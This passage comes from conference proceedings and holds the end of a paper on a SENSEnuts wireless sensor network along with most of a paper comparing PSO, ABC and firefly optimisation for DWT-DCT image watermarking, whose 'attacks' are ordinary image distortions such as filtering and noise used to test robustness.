is checked in the beginning of the setup connection.
The specifications of hardware and software used are.

4 Results and Discussion

4.1 Output on Senselive

The data coming from the real-time sensor nodes can be verified in the senselive.
This data gets updated on real-time basis on the senselive platform. Different sets are
made according to their parameters and usability such as GAP sensor, HTP sensor,
TL sensor, and the data coming from these sensors get continuously updated on
the senselive platform. GAP sensor output is given in Figs. 4, 5, 6, 7, and 8, while
that of HTP and TL sensors can be similarly given by using senslive GUI interface,
respectively. The changes in position, temperature, light, humidity, and pressure can
be seen in the senselive platform which are shown in Figs. 4, 5, 6, 7, and 8.
In Figs. 4, 5, 6, 7, and 8, this data is shown on senselive GUI of the GAP sensor
node. The GAP sensor node gives us live reading coming from the actual connected
node and can be used to sense real-time reading that could be helpful in detecting
object acceleration in x, y, z plane. The movement of this GAP sensor gives us the
308 M. D. Gazi et al.

Fig. 4 GAP sensor module

Fig. 5 HTP sensor module

Fig. 6 Total sensor stack


Wireless Sensor Network for Various Hardware Parameters … 309

Fig. 7 Extender module

Fig. 8 Radio module

change in the real-time readings in three planes of movement of object which helps
us in detecting the plane of motion of the object also. The usage of this SENSEnuts
GAP sensor not only is beneficial over conventional triaxial type of accelerometers
for detection and motion of moving object in on three axis planes that requires a lot of
augmented and neural network-based designing and coding for its live updation that is
shown in this proposed work using GAP sensor using senselive GUI, but also proves
to be cost efficient, less power consuming, and real-time updating of reading on the
open-source cloud. The usage of this GAP sensor from this SENSEnuts package
could be used in real-time updation services in defense technology for real-time
310 M. D. Gazi et al.

Fig. 9 Sensing and processing the information

updation and monitoring. Similarly, the data can be given on senselive GUI for the
TL sensor that gives us the real-time updation of the temperature and light using
this senselive package. In this way, the TL sensor data can help the user for regular
climatic updation for any agricultural usage and purpose. The data coming from
the TL sensor node also get updated on the real-time GUI interface of SENSEnuts
makes it user-friendly, low power consuming application, and its real-time updation.
Similarly, we can notice the change in real-time updation of the reading coming from
the HTP sensor node that are also updated on the real time on the senselive GUI for
its analysis and usage (Figs. 10, 11, 12, 13 and 14).

4.2 Monitoring

The real-time sensor nodes are connected to the coordinators that are essential part
for the monitoring process. The GAP sensor node gets us the values of change in
orientational acceleration and positioning that could be used for sensing of real-
time activity. Similarly the TL sensor nodes give us the real-time node readings for
temperature and light sensing that eventually could prove beneficial for smart home
system technology for live updating and reading from TL sensor node to the user
system interface. Another important part of this SENSEnuts platform consists of
the radiomodule that is used to send data to the coordinator (PAN). Then this PAN
Wireless Sensor Network for Various Hardware Parameters … 311

Fig. 10 Senselive data of GAP sensor for orientation 1

Fig. 11 Senselive data on GAP sensor for orientation 2

coordinator with the help of Wi-Fi module can help us to display the live readings
from the real-time sensor to the senselive GUI. In this way, this method is cost
effective, uses less power, and proves to be helpful in remote monitoring.
312 M. D. Gazi et al.

Fig. 12 Senselive data on GAP sensor for orientation 3

Fig. 13 Senselive data on GAP sensor for orientation 4

5 Conclusion

In this work, we have used the concept of connecting the sensor world to the IoT
with hassle free concept and with high precision and accuracy using wireless sensor
network (WSN). The data coming from the real-time sensors can be easily sensed
and used for future applications. The proposed work proved to be hassle free in
comparison to the conventional triaxial accelerometeric three plane detection system
Wireless Sensor Network for Various Hardware Parameters … 313

Fig. 14 Senslive data on GAP sensor for orientation 5

with a lot less computational complexity, no neural network modeling, easy live
updation on senslive GUI and easy forwarding to the cloud for further usage. A
small change in temperature, acceleration, luminosity, humidity, and pressure were
detected with a small or less delay that is on the cloud end at the time of updating the
real-time data from the sensor nodes to the senslive GUI. In this way, wireless sensor
network with its usage using sensnuts hardware package and its GUIs proves to be
very user-friendly, cost effective, low power consuming and gives us the edge over
the conventional hardware implanting technologies whether in the field of detecting
object acceleration or motion or in smart home systems for detecting and monitoring
of light, temperature for user-friendly system applications. In future, we can improve
the limited range by using multi-hop type of communication system and by using
suitable routing protocols available so that the data packet can reach easily to the
destination and can also send this real-time senslive GUI data to any cloud service
for its usage over Internet from very distant places.

References

1. Jalal, A., Majid, A. K. Q., & Sidduqi., M. A. A triaxial based human motion detection for
ambient smart home systems. In IBCAST. https://doi.org/10.1109/IBCAST.2019.8667183.
2. Khan, A. M., Lee, Y. K., Lee, S. Y., & Kim, T. S. (2010). A triaxial accelerometer-based
physical-activity recognition via augmented-signal features and a hierarchical recognizer. IEEE
Transactions on Information Technology in Biomedicine, 14(5), 1166–1172. https://doi.org/10.
1109/titb.2010.2051955
3. Haswani, N. G., & Deore, P. J. (2018). Web-based realtime underground drainage or sewage
monitoring system using wireless sensor networks. In 2018 Fourth International Conference
on Computing Communication Control and Automation (ICCUBEA) (pp. 1–5)
314 M. D. Gazi et al.

4. Estrada-Lopez, J. J., Castillo-Atoche, A. A., Vazquez-Castillo, J., & Sanchez-Sinencio, E.


(2018). Smart soil parameters estimation system using an autonomous wireless sensor network
with dynamic power management strategy. IEEE Sensors Journal, 18(21), 8913–8923. https://
doi.org/10.1109/jsen.2018.2867432
5. Thyagarajan, J., & Sundararaja, S. (2018). Energy aware corona level based routing approach
for IEEE 802.15.4 based wireless sensor networks. International Journal of Pure and Applied
Mathematics, 120(5), 1275–1295.
6. Agarwal, S., Payal, A., & Reddy, B. V. R. (2017). Design and implementation of medium
access control based routing on real wireless sensor networks testbed. International Journal of
Computer and Information Engineering, 11(6), 670–678.
7. Ray, P. P. (2016). An Internet of Things based approach to thermal comfort measurement and
monitoring. In 3rd International Conference on Advanced Computing and Communication
Systems (ICACCS) (pp. 1–7)
8. Han, X., Cao, X., Lloyd, E. L., & Shen, C. (2007). Fault-tolerant relay node placement in
heterogeneous wireless sensor networks. In IEEE INFOCOM 2007—26th IEEE International
Conference on Computer Communications (pp. 1667–1675).
9. Misic, J., Misic, V. B., & Shafi, S. (2004). Performance of IEEE 802.15.4 beacon enabled
PAN with uplink transmissions in non-saturation mode-access delay for finite buffers. In First
International Conference on Broadband Networks (pp. 416–425)
10. Ting, K. S., Ee, G. K., Ng, C. K., Noordin, N. K., & Ali, B. M. (2011). The performance
evaluation of IEEE 802.11 against IEEE 802.15.4 with low transmission power. In The 17th
Asia Pacific Conference on Communications (pp. 850–855).
11. Sun, Y., Li, L., & Luo, H. (2011). Design of FPGA-based multimedia node for WSN. In 7th
International Conference on Wireless Communications, Networking and Mobile Computing
(pp. 1–5).
12. Yuan, W., Wang, X., & Linnartz, J. M. G. (2007). A coexistence model of IEEE 802.15.4 and
IEEE 802.11 b/g. In 14th IEEE Symposium on Communications and Vehicular Technology in
the Benelux (pp. 1–5).
13. Yuan, W., Linnartz, J. M. G., & Niemegeers, I. G. M. M. (2010). Adaptive CCA for
IEEE 802.15.4 wireless sensor networks to mitigate interference. In 2010 IEEE Wireless
Communication and Networking Conference (pp. 1–5).
14. Zou, Y., & Wang, G. (2016). Intercept behavior analysis of industrial wireless sensor networks
in the presence of eavesdropping attack. IEEE Transactions on Industrial Informatics, 12(2),
780–787.
15. Heo, J., Hong, J., & Cho, Y. (2009). EARQ: Energy aware routing for real-time and reli-
able communication in wireless industrial sensor networks. IEEE Transactions on Industrial
Informatics, 5(1), 3–11. https://doi.org/10.1109/tii.2008.2011052
16. Chan, K., Cheang, C., & Choi, W. (2014). ZigBee wireless sensor network for surface
drainage monitoring and flood prediction. In 2014 International Symposium on Antennas and
Propagation Conference Proceedings (pp. 391–392).
17. Akhondi, M. R., Talevski, A., Carlsen, S., & Petersen, S. (2010) The role of wireless sensor
networks (WSNs) in industrial oil and gas condition monitoring. In 4th IEEE International
Conference on Digital Ecosystems and Technologies (pp. 618–623).
Comparative Analysis: Role
of Meta-Heuristic Algorithms in Image
Watermarking Optimization

Preeti Garg and R. Rama Kishore

Abstract The aim of watermarking is to provide copyright protection and authenti-


cation to the digital contents available over the network. A good quality watermarking
scheme should provide a balance between various characteristics of watermarking.
In this paper, a DCT and DWT based hybrid watermarking system is implemented
to provide copyright protection to the content and is secured by using Arnold trans-
form. The paper’s objective is to study and analyze the performance of various meta-
heuristics algorithms in the watermarking field. This paper shows the performance
of particle swarm, artificial bee colony, and firefly algorithms against digital image
watermarking. These algorithms are used to find the optimal value of the watermark
strength factor, which is responsible for providing the balance between robustness
and imperceptibility. The proposed scheme shows good performance in terms of
PSNR, NC, and BER values. For providing security to the watermark image, the
image is scrambled by using the Arnold transform. The robustness of the scheme is
evaluated against different types of image processing attacks.

Keywords Digital watermarking · Meta-heuristic optimization · ABC · Firefly ·


PSO

1 Introduction

Copyright protection of digital contents is essential to achieve legal ownership over


that information. Watermarking is one technique that helps the owners have their
rights over their own content, which they can use to protect the content from unau-
thorized modification. Watermarks are the information added over any digital content

P. Garg (B) · R. Rama Kishore


University School of Information and Communication Technology, Guru Gobind Singh
Indraprastha University, Dwarka, New Delhi, India
P. Garg
Department of CSE, KIET, Ghaziabad, India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 315
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_26
316 P. Garg and R. Rama Kishore

which can be used for authentication purpose. A watermark can be visible to end-
users like, while creating a video using any application that application adds its logo
over that video. But these visible watermarks can be deleted quickly by using Photo-
shop, and these also decreased the quality of the content. Most people use invisible
watermarks so that these can’t be visible to anyone and still serve their purpose. The
basic phenomenon of watermarking is to add an image, text, logo, or information to
cover data to provide intellectual property rights to that content. This logo can be
extracted when required to fulfill the task [1]. While adding a watermark to the cover
content, the original image’s quality should not degrade, and it should be recoverable
after various attacks applied over the content [2, 3].
There are various watermarking applications like copyright protection, broadcast
monitoring, fingerprinting, and medical applications [4-7], which attract researchers
to work in this field. Now a day’s watermarking is being used in medical fields
to protect the confidential information of patients. Watermarking can be performed
in spatial domain [8-10] or in frequency domain [11-14]. But now a day’s mostly
frequency-domain techniques are being used as these provide better robustness to the
watermark added to the image. To provide a good balance between imperceptibility
and robustness, a combination of frequency-domain techniques like DFT and DCT
based [15], DFT, DWT, SVD [16], and DWT, DCT [17] are being used. The quality
of the watermarking scheme (known as imperceptions) is measured by calculating its
PSNR value [18] and MSE, while its robustness against various attacks is measured
using normalized correlation (NC) [19] and bit error rate (BER). It is very hard for
an algorithm to maintain the original image’s quality, while providing good behavior
against various attacks. So an optimization procedure is required to achieve this
objective, one of the techniques to perform optimization is called nature-inspired
optimization. As the name suggests, these algorithms are inspired by the natural
behavior of the spices available in the nature like honey bees, ants, cuckoos, bat, etc.
Many nature-inspired algorithms have been used in the watermarking field [20-24]
to optimize the scheme to find the balance and maintain the quality of the image.
This paper aims to study and analyze these meta-heuristics algorithms’ behavior
in the watermarking procedure. For this purpose, a watermark has been added to the
cover image using a hybrid scheme in the frequency domain with 1-Level DWT and
DCT schemes. It is then optimized using three different meta-heuristic algorithms
called firefly, artificial bee colony, and particle swarm optimization algorithms. Here,
these algorithms are used to find the strength factor used in the watermarking embed-
ding procedure, which is crucial in providing the tradeoff between quality and robust-
ness. The proposed scheme is a blind technique that does not require the original
image or watermark at the time of its extraction, making it more secure.
The rest of the paper is divided into various sections like Sect. 2 describes various
works done in the field of optimization of the watermarking procedure. Section 3
describes the proposed embedding and extraction algorithm. All the experimental
results and comparative analysis is discussed in Sects. 4 and 5 show the compara-
tive analysis. Section 6 concludes the proposed work and shows some of its future
directions.
Comparative Analysis: Role of Meta-Heuristic Algorithms … 317

Table 1 Parameters used in


PSO algorithm ABC algorithm Firefly algorithm
various optimization
algorithms Max_iter:50 Max_iter:50 Max_iter:50
Population Population size:100 Population size:100
size:100
Lower bound: 25 Lower bound: 25 Lower bound: 25
Upper Bound:35 Upper Bound:35 Upper Bound:35
Inertia max = 1.1 Food Source: 200 Alpha = 0.01
Inertia min = 0.1 Limit:100 Beta = 1
Correlation factor1 Gamma = 1
= 1.49
Correlation factor1 Theta = 0.97
= 1.49

2 Related Work

A number of nature-inspired algorithms use swarms intelligence concepts to opti-


mize the results like the genetic algorithm, firefly algorithm, gray wolf optimization,
bat optimization, particle swarm optimization, artificial bee colony, ant colony opti-
mization, and many more. Several authors have used these schemes to optimize their
results according to their needs. A new optimized function is described in [25], which
provides robustness against various attacks, while maintaining the predefined quality.
In this scheme, the ABC algorithm has been used to calculate the embedding factor,
which is calculated with PSNR and BCR (Bit Correction Rate) values. Researchers
have used hybrid techniques for embedding the watermark and different nature-
inspired algorithms for providing the optimization. In [26], a multi-optimized water-
marking scheme using bat algorithm and firefly algorithm has been implemented
for color images. Another watermarking scheme based on DCT transformation is
explained in [27], which uses the PSO algorithm to optimize the strength factor value.
Here, regression kernel-based extreme machine learning is used. A watermarking
scheme optimized using a modified Whale algorithm is proposed in [28]. In this
scheme, DWT-SVD based watermarking is performed, which uses modified whale
optimization for finding the multiscale factor. A firefly algorithm-based optimization
is used in [29]. Here, the firefly algorithm is used to find the embedding location for the
watermark. A distinct discrete firefly algorithm is used in [firefly/selecting optimal]
for choosing the optimal blocks for embedding, and Hadamard transform is used
for watermark embedding in the frequency domain. In this scheme, firstly original
image is converted into blocks of size 8*8 and then Hadamard transform is applied
on these blocks, and then, the watermark is embedded only on positive Hadamard
coefficients. ABC algorithm-based optimization technique is implemented in [22],
which uses IWT and SVD to embed the watermark. Authors in [26] have also used
firefly algorithm for optimizing the results of watermarking. In the proposed work the
optimization process is performed using Firefly, ABC and PSO algorithms. Firefly
318 P. Garg and R. Rama Kishore

algorithm is based on flashing behavior of the fireflies. In this algorithm, it is assumed


that the fireflies are attracted towards each other [30]. Artificial Bee Colony is intro-
duced in [31], which uses the concept of intelligence of honey bees. In [32], authors
described the ABC algorithm based on honey bees’ foraging behavior that how honey
bees find their food collectively. One of the advantages of using the ABC algorithm
is that it is faster than other heuristic techniques as it uses fewer control parameters
[33]. The PSO algorithm is proposed by Kennedy and Ebernhart [34], an iterative
optimization technique. PSO is a searching process based on swarms, which is used
for optimization purposes [35].

3 Proposed Technique

The proposed scheme is a blind watermarking technique that provides the robust-
ness, imperceptibility, and security characteristics of the digital watermarking. In
this paper, a grayscale image of size 512*512 is taken as an input or cover image on
which the watermark logo is embedded by using the DWT technique. DWT converts
an image into hierarchies of information, both spatial domain as well as frequency
domain [36]. Firstly, DWT is applied to the cover image, and then, it is performed
again on the LL sub-band of size 128*128. Then, LL1 sub-band is chosen to embed
the watermark. The reason for choosing the LL sub-band for embedding is that LL
represents the image’s low resolution. DCT (Discrete Cosine Transform) is applied
on LL1 sub-band; DCT is a linear orthogonal transformation mostly used in digital
image processing [37]. The watermark logo is scrambled using the Arnold trans-
form and then used to embed DCT of the LL1 sub-band to provide security to the
scheme. The proposed scheme is optimized by using many multi-objective func-
tions based meta-heuristic algorithm called PSO, ABC, and Firefly algorithm. The
proposed method is a blind watermarking technique because it requires only the
embedded watermark image at the time of extraction, making it a secure scheme.
Table 1 shows all the initial parameters used in all three optimization algorithms.
Here, standard parameters like population size and iteration numbers are the same
for all three algorithms. The algorithm of watermark embedding and extraction is
shown in Algorithm 4. This section describes the algorithm used for embedding
the watermark in the grayscale image of size 512*512 and its extraction process.
All the experiments are performed on the Lena image as the Cover image, and for
watermarking, a logo image of size 64*64 is used for embedding purposes. Here,
extraction of watermark is done blindly as it only requires the embedded image
and not the original cover or watermark image. Only the key used to encrypt the
watermark is needed to decrypt it after extracting it from the embedded image. The
complete process of watermark extraction and embedding is shown in Fig. 1. Here
during embedding, different scaling factors are used, which is calculated by using
three meta-heuristic techniques.
Algorithm 4: Steps of proposed approach
Comparative Analysis: Role of Meta-Heuristic Algorithms … 319

Cover DWT Computation Block division DCT Computation


Image on LL1 sub band
Scaling factor
Watermark Arnold Computation Bitwise water-
obtained using PSO
Image mark embedding
in selected Scaling factor
obtained using ABC
Watermarked Inverse DWT of Inverse DCT of
Image Scaling factor
embedded selected blocks
obtained using Firefly

Block division & Watermark bit extraction & Extracted Water-


DCT computation combination mark Image

Fig. 1 Block diagram of the proposed scheme

Embedding:
1. Read the cover image of size m*n and perform 1-Level DWT on the cover image to convert it into 4 different sub-bands of
equal-sized.
[LL1, HL1, LH1, HH1]=DWT(I) m,n
Where LL1, HL1, LH1 and HH1 are 4 sub-bands arranged in increasing order of its frequency and (I) m,n is the original
cover image of size m*n
2. Select the LL1 sub-band of the host image as it has most of the cover image information and convert it into various blocks
of size 4*4.
3. Perform block-wise DCT on every block received in step 2.
4. Read the 64*64 watermark image and scrambled it using Arnold transform technique to provide security to the watermark
image.
5. Convert the scrambled watermark into a vector so that bitwise watermark embedding can be performed on each block of
size 4*4.
6. Choose a location from each block based on its frequency content to embed the watermark. Here watermark bits are em-
bedded by adding or subtracting a watermark strength factor obtained by applying the meta-heuristic algorithms. This val-
ue of the embedding factor is calculated using firefly, PSO, and ABC algorithm and then is used one by one for embedding
the watermark bit. The watermark is embedded by using the following equations:
If SW(i)=1:
bx(i,j)=bx(i,j)-SF;
else if SW(i)=0
bx(i,j)=bx(i,j)+SF;
where, bx(i,j) is the location selected in blocks for embedding and SF is the robustness factor or embedding strength
factor calculated using Artificial Bee Colony Algorithm, firefly algorithm, and Particle Swarm Optimization tech-
niques. The process of computing the embedding factor using these algorithms is described in Section 3. The loca-
tions used for embedding are worked as the key values to be used at the time of extraction of the watermark.
7. Combine each block back to form a block of sized 256*256 and perform Inverse DCT (IDCT) on it to get the image in the
spatial domain
8. Now, the embedded LL1 sub-band is combined with other sub-bands by applying IDWT and get the watermarked image.

Extraction:
1. Read the watermarked image and perform 2-D DWT on it.
[LL1,HL1, LH1, HH1]= DWT(Ewk)
2. Perform block-wise DCT on LL1 sub-band and divide the image into blocks of size 4*4 as shown in embedding algorithm
in step 4.
3. Find the pixel values of each selected block used for embedding and
if pix >=0
wm(i,j)=0;
else if pix < 0
wm(i,j)=1;
Where wm(i,j) is the pixel value of the watermark image at location i, j
4. Combine all the results obtained in Step 4 into a vector. The image received is the scrambled watermark image; now, it is
unscrambled using the key used when embedding it. The received image is the extracted watermark image. Now it is com-
pared with the original image to check its robustness and imperceptibility.
320 P. Garg and R. Rama Kishore

4 Results and Discussion

The proposed scheme is performed on Lena grayscale images of size 512*512, as


shown in Table 2. All the experiments are implemented on MATLAB R2020a with
4 GB RAM and Intel ® core™ processor. For embedding watermark logo image of
64*64 is used. The watermarking scheme is optimized using various different nature-
inspired algorithms to optimize the results of robustness and imperceptibility. Here,
different attacks are applied on the embedded watermark image with some parameters
as shown in Table 2. The scheme’s objective is to make the watermarked image robust
against these different types of image processing, geometric and noise attacks, and
maintaining its perceptual quality. Because of this reason, both NC value and the
PSNR value take part in the objective function of the swarm intelligence algorithms,
as shown in Eq. 1. The proposed scheme is evaluated using two measures.

Table 2 PSNR values of different images


Algorithm name Image name Original image Watermarked image PSNR value
PSO Lena 35.1205

ABC Lena 38.1308

Firefly Lena 38.5020

PSO Pepper 36.5171

ABC Pepper 35.1243

Firefly Pepper 36.5200


Comparative Analysis: Role of Meta-Heuristic Algorithms … 321

4.1 Perceptual Quality Measurement

The term perceptual quality means that once the watermark image is embedded into
the original image, it should not be visible to the end-user, and the embedded image
should look like the original image only [38, 39]. There are various measures used
to measure it, like MSE (Mean Square Error), PSNR (Peak Signal to Noise Ration).
PSNR is one of the most useful measures because it gives the statistical difference
between the original cover image and watermarked image [14]. Higher the value
of PSNR, the more invisible the watermark is. Generally, a PSNR value of 27 is
acceptable, which is achieved using the proposed scheme. A PSNR value greater
than 35 is achieved for all the techniques used here, as shown in Table 1, proving
that the proposed scheme is very imperceptible.

4.2 Robustness Measurement

Robustness means the watermark image’s capacity to handle the attack, or it is used
to measure the similarity between the original watermark image and the extracted
watermark. There are various measures used to calculate the robustness; one of these
is BER (Bit Error Correction), which calculates the error rate between the original
and extracted watermark image. The most common measure of watermark robustness
is NC (Normalized Correlation) [40], which measures the correlation between the
original and extracted watermark image. The more correlation between these two
images, the more close NC value will be toward 1. In this technique, both NC and
BER values are calculated for all the attacks to measure the scheme’s robustness.
Their NC values are calculated against various attacks as shown in Table 3, and BER
values are shown in Table 4. The NC value greater than 0.9 is achieved for all the
techniques applied for optimization.

5 Comparative Analysis

The results of these optimization techniques are compared with each other in terms
of NC value and the BER values as shown in Figs. 2, 3, 4, and 5. It can be seen that the
results of applying each algorithm are different even though they all are performing
the same task. From all the experiments, we can summarize that the firefly algo-
rithm is very efficient in solving complex problems and converges faster than the
PSO algorithm and the artificial bee algorithm. Here, the term convergence means
the algorithm reaches the optimization results more quickly than the other two algo-
rithms. The reason for its faster convergence is that the firefly algorithm’s parameters
can be tuned to control the randomness as the number of iterations proceeds. The
time complexity of the firefly algorithm is better than the PSO algorithm as in PSO,
322 P. Garg and R. Rama Kishore

Table 3 NC values of extracted watermark images using various optimization technique after
performing various attacks
S. No. Attack type Lena image Pepper image
PSO ABC Firefly PSO ABC Firefly
1 Median 0.9820 0.9607 0.9607 0.9995 1 0.9995
filtering (3*3)
2 Average 0.9684 0.9420 0.9420 0.9973 0.9995 0.9989
filtering (3*3)
3 Resizing 0.9814 0.9587 0.9587 0.9995 0.9995 0.9995
4 Rotation (20°) 0.9902 0.9883 0.9883 1 1 1
5 Histogram 0.9892 0.9793 0.9793 0.9979 0.9989 0.9984
equalization
6 Gaussian noise 0.9888 0.9424 0.9500 0.9973 0.9989 0.9995
(v = 0.001)
7 Weiner filter 0.9904 0.9689 0.9689 0.9989 1 1
(2*2)
8 Gaussian 0.9936 0.9824 0.9824 0.9995 1 1
average
filtering
9 Average 0.9720 0.9444 0.9444 0.9973 0.9995 0.9995
filtering (3*3)
10 Salt n pepper 0.9946 0.9752 0.9788 0.9872 0.9979 0.9931
noise (0.001)
11 Sharpening 0.9968 0.9909 0.9909 1 1 1
(0.8)
12 Speckle noise 0.9952 0.9872 0.9846 1 1 1
(0.001)
Average value 0.9868 0.9683 0.9690 0.9978 0.9995 0.9990

its complexity depends on the number of iterations multiplied by the square of the
population size. The ABC algorithm is very simple from the calculation perspectives
and requires very few parameters to initialize at the starting phase. It also has a high
probability of finding the correct results, but in the case of PSO algorithm, it is not
guaranteed that it always converges to a global best-optimized result. One of the
advantages of the ABC algorithm is the concept of abundant used in it, in this if
the employed bees are not able to find the optimal solution, then the bees abundant
this solution and transform to the scout bees. The success rate in the ABC algorithm
is higher than that of the PSO algorithm. One advantage of using PSO algorithm
for optimization is that it is effortless to implement, and it requires few parameters
for the calculation. From these experiments, it is apparent that all the optimization
algorithms provide the right balance between imperceptibility and robustness.
Comparative Analysis: Role of Meta-Heuristic Algorithms … 323

Table 4 BER values of extracted watermark images using various optimization technique after
performing various attacks
S. No. Attack type Lena image (BER values) Pepper image (BER values)
PSO ABC Firefly PSO ABC Firefly
1 Median 0.0083 0.0183 0.0183 0.0002 0 0.0002
filtering (3*3)
2 Average 0.0146 0.0276 0.0276 0.0012 0.0002 0.0005
filtering (3*3)
3 Resizing 0.0085 0.0193 0.0193 0.0002 0.0002 0.0002
4 Rotation (20°) 0.0017 0.0054 0.0054 0 0 0
5 Histogram 0.0049 0.0095 0.0095 0.0010 0.0005 0.0007
equalization
6 Gaussian noise 0.0051 0.0276 0.0237 0.0012 0.0005 0.0002
(v = 0.001)
7 Weiner filter 0.0044 0.0144 0.0144 0.0005 0 0
(2*2)
8 Gaussian 0.0029 0.0081 0.0081 0.0002 0 0
average
filtering
9 Average 0.0129 0.0264 0.0264 0.0012 0.0002 0.0002
filtering (3*3)
10 Salt n pepper 0.0024 0.0115 0.0100 0.0059 0.0010 0.0032
noise (0.001)
11 Sharpening 0.0015 0.0042 0.0042 0 0 0
(0.8)
12 Speckle noise 0.0022 0.0059 0.0071 0 0 0
(0.001)
Average value 0.0057 0.0148 0.0145 0.0009 0.0001 0.0004

Fig. 2 NC value comparison 1.005


chart for pepper image
1
NC Value

0.995
PSO
0.99
ABC
0.985
Firefly
0.98
1 2 3 4 5 6 7 8 9 10 11 12
Attacks
324 P. Garg and R. Rama Kishore

Fig. 3 NC value comparison 1.02


chart for lena image
1

0.98

NC Value
0.96 PSO

0.94 ABC

0.92 Firefly

0.9
1 2 3 4 5 6 7 8 9 10 11 12
Attacks

Fig. 4 BER value 0.007


comparison chart for pepper 0.006
image
0.005
BER value

0.004
PSO
0.003
ABC
0.002
0.001 Firefly

0
1 2 3 4 5 6 7 8 9 10 11 12
Attacks

Fig. 5 BER value 0.03


comparison chart for lena
image 0.025
0.02
BER value

0.015 PSO

0.01 ABC

0.005 Firefly

0
1 2 3 4 5 6 7 8 9 10 11 12
Attacks

6 Conclusion

Watermarking is a technique that helps the owner have the right on their own content
available over the network. The watermark added to the cover image should not
degrade the original content’s quality, and it should also be robust against several
image processing attacks. The proposed watermarking scheme provides a right
balance between the robustness and imperceptibility characteristics and provides
Comparative Analysis: Role of Meta-Heuristic Algorithms … 325

security to the watermark. This study aims to analyze the performance of meta-
heuristic algorithms in the watermarking field and see how these can optimize the
watermark embedding and extraction process results. Here, these algorithms are used
to optimize the embedding strength factor used in the embedding process. From this
study, we can conclude that the firefly algorithm convergence faster than the other two
algorithms. The ABC algorithm requires very few initialization parameters, which
makes it more quickly than other algorithms. The results with all the three algorithms
are different even though they all are performing the same task. This is because every
algorithm has its method to find the optimal global solution. This analysis can help
the researchers to choose these algorithms according to their problem domain.
The proposed scheme provides a right balance between robustness and impercep-
tibility by optimizing the embedding strength factor using swarm intelligence algo-
rithms. Embedding watermark directly into the pixel values is not a robust method
because of that here embedding is performed on the frequency domain of the cover
image. The performance of the proposed scheme is evaluated using three param-
eters called PSNR, BER, and NC. The comparison between all three optimization
techniques shows that the proposed methodology works well against most of the
attacks and gives a PSNR value greater than 35 and an average NC value of 0.96 for
all the algorithms. In future, work can be done to analyze some other optimization
algorithms like meta-heuristic or fuzzy logic-based.

7 Conflict of Interest

The authors declare that they have no conflict of interest.

References

1. Ahmadi, S. B. B., Zhang, G., & Wei, S. (2019). Robust and hybrid SVD-based image water-
marking schemes: A survey. Multimedia Tools and Applicationshttps://doi.org/10.1007/s11
042-019-08197-6
2. Cayre, F., Fontaine, C., & Furon, T. (2005). Watermarking security: Theory and practice. IEEE
Transactions on Signal Processing, 53(10), 3976–3987.
3. Cox, I., Miller, M., Bloom, J., Fridrich, J., & Kalker, T. (2007). Digital watermarking and
steganography (pp. 61–102). San Mateo: Morgan Kaufmann.
4. Agarwal, N., Singh, A., & Singh, P. (2019). Survey of robust and imperceptible watermarking.
Multimedia Tools and Applications, 78. https://doi.org/10.1007/s11042-018-7128-5
5. Abdelhakim, A., Saleh, H., & Nassar, A. (2016). Quality metric-based fitness function for robust
watermarking optimization with. Bees Algorithm IET Image Processing, 10(3), 247–252.
6. Abraham, J., & Paul, V. (2016). An imperceptible spatial domain color image watermarking
scheme. Journal of King Saud University—Computer and Information Sciences, 1–10, 31–133.
7. Garg, P., & Kishore, R. (2020). Performance comparison of various watermarking techniques.
Multimedia Tools and Applications, 79, 25921–25967.
326 P. Garg and R. Rama Kishore

8. Singh, A., Sharma, N., Dave, M., & Mohan, A. (2012). A novel technique for digital image
watermarking in spatial domain. In Proceedings of 2nd IEEE International Conference on
Parallel, Distributed and Grid Computing, PDGC (pp. 497–501).
9. Mathur, S., Dhingra, A., Prabukumar, M., Loganathan, A., & Muralibabu, K. (2016). An
efficient spatial domain based image watermarking using shell based pixel selection. In
International Conference on Advances in Computing, Communications and Informatics
(pp. 2696–2702). IEEE.
10. Bamatraf, A., Ibrahim, R., & Salleh, M. (2011). Digital watermarking algorithm using LSB.
In International Conference on Computer Applications and Industrial Electronics (ICCAIE)
(pp. 155–159). IEEE Xplore.
11. Patel, S., Mehta, T., & Pradhan, S. (2011). A unified technique for robust digital watermarking
of colour images using data mining and DCT. International Journal of Internet Technology
and Secured Transactions, 3, 81–96.
12. Pradhan, C., Saxena, V., & Bisoi, A. (2012). Non blind digital watermarking technique using
DCT and cross chaos map. In International conference on Communications, Devices and
Intelligent Systems (CODIS) (pp. 274–277). IEEE.
13. Li, N., Zheng, X., Zhao, Y., Wu, H., & Li, S. (2008). Robust algorithm of digital image
watermarking based on discrete wavelet transform. In International Symposium on Electronic
Commerce and Security (pp. 942–945). IEEE.
14. Maruturi, H., Bindu, H., & Swamy, K. (2016). A secure an invisible image watermarking
scheme based on wavelet transform in HSI color space. Procedia Computer Science, 93, 462–
468.
15. Hamidi, M., Haziti, M., Cherifi, H., & Mohammed, EL. H. (2018). Hybrid blind robust image
watermarking technique based on DFT-DCT and Arnold transform. Multimedia Tools and
Applications, 1–34.
16. Advith, J., Varun, K., & Manikantan, K. (2016). Novel digital image watermarking using
DWT-DFT-SVD in YCbCr color space (pp. 1–6). IEEE.
17. Hua, G., Huang, J., Shi, Y., Goh, J., & Thing, V. (2016). Twenty years of digital audio
watermarking—A comprehensive review. Signal Processing, 128, 222–242.
18. Singh, A., Dave, M., & Mohan, A. (2014). Hybrid technique for robust and imperceptible
multiple watermarking using medical images. Multimedia Tools Application, 1–21.
19. Perwej, Y., Parwej, F., & Perwej, A. (2012). An adaptive watermarking technique for the
copyright of digital images and digital image protection. International Journal of Multimedia
& Its Applications, 4(2), 21–38.
20. Aditya, K., Choudhary, A., Sing, M., & Adhikari, A. (2017). Image watermarking based on
cuckoo search with dwt using lévy flight algorithms (pp. 29–33). https://doi.org/10.1109/NET
ACT.2017.8076737.
21. Ansari, I., Pant, M., & Ahn, C. (2017). Secured and optimized robust image watermarking
scheme. Arabian Journal for Science and Engineering, 43. https://doi.org/10.1007/s13369-
017-2777-7.
22. Ansari, I., Pant, M., Ahn, C. W. (2017). Artificial bee colony optimized robust-reversible image
watermarking. Multimedia Tools and Applications, 76.
23. Raj, S. J., Jero, E., Ramu, P., & Swaminathan, R. (2015). Imperceptibility—Robustness tradeoff
studies for ECG steganography using continuous Ant Colony optimization. Expert Systems with
Applications, 49. https://doi.org/10.1016/j.eswa.2015.12.010.
24. Ramasamy, R., & Arumugam, V. (2020). Robust image watermarking using fractional
